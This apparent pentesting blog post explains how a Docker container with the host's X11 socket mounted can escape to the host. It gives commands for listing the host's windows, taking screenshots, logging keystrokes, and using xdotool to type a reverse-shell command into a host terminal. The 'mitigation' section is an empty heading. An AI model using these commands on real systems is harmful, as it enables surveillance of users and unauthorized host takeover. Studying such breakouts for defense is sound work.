Docker Breakout Using X11

May 18, 2018
docker pentesting hacking

Use Docker to run GUI applications they said.

Mount the X11 socket they said.

Allow other users to access your X session they said.

This post covers Docker container breakouts by abusing bad security practices related to the X11 socket.

The problem

To display windows spawned through a Docker container, people often launch containers following these steps:

The X11 socket is mounted as read only - it’s secure right?

The breakout(s)

These attacks can be performed after gaining access to a Docker container:

Reading Window Information

With xwininfo -root -tree it’s possible to check which windows are opened on the host system, including the window titles:

[...]
0xredacted "[i3 con] container around 0xredacted": ("i3-frame" "i3-frame") [...]
        1 child:
        0xredacted "Write: super secret thing": ("Msgcompose" "Thunderbird") [...]
[...]

Taking screenshots

The command xwd -root -screen > screenshot.xwd && convert screenshot.xwd screenshot.png can be used to create a screenshot of the hosts display which makes it possible to watch every action a user performs on the system.

Keylogging

By mounting the X11 socket into the container a user doesn’t just mount the display. Additionally they keyboard also gets shared, so to say. With this, it’s possible to log all keystrokes. There may be better tools for this, but during tests xkey seemed to perform very reliable. Using xkey it’s possible to perform a specific action in case a previously defined key gets hit.

Getting a shell

Although it’s not very stealthy, this method allows getting a shell on the host system. This works by sending keystrokes to the X server in order to open a terminal and execute commands:

xdotool key <Shortcut to open a terminal>
xdotool type 'xterm'
xdotool key Return
xdotool type --delay 50 '<Desired reverse or bind shell command>'
xdotool key Return

This is fine

The mitigation

Resources

Information Leak in Docker

January 4, 2019
docker vulnerability

Methods to Upgrade nc Reverse Shells

May 16, 2018
pentesting shell

2 Common Python Security Issues

May 13, 2018
pentesting python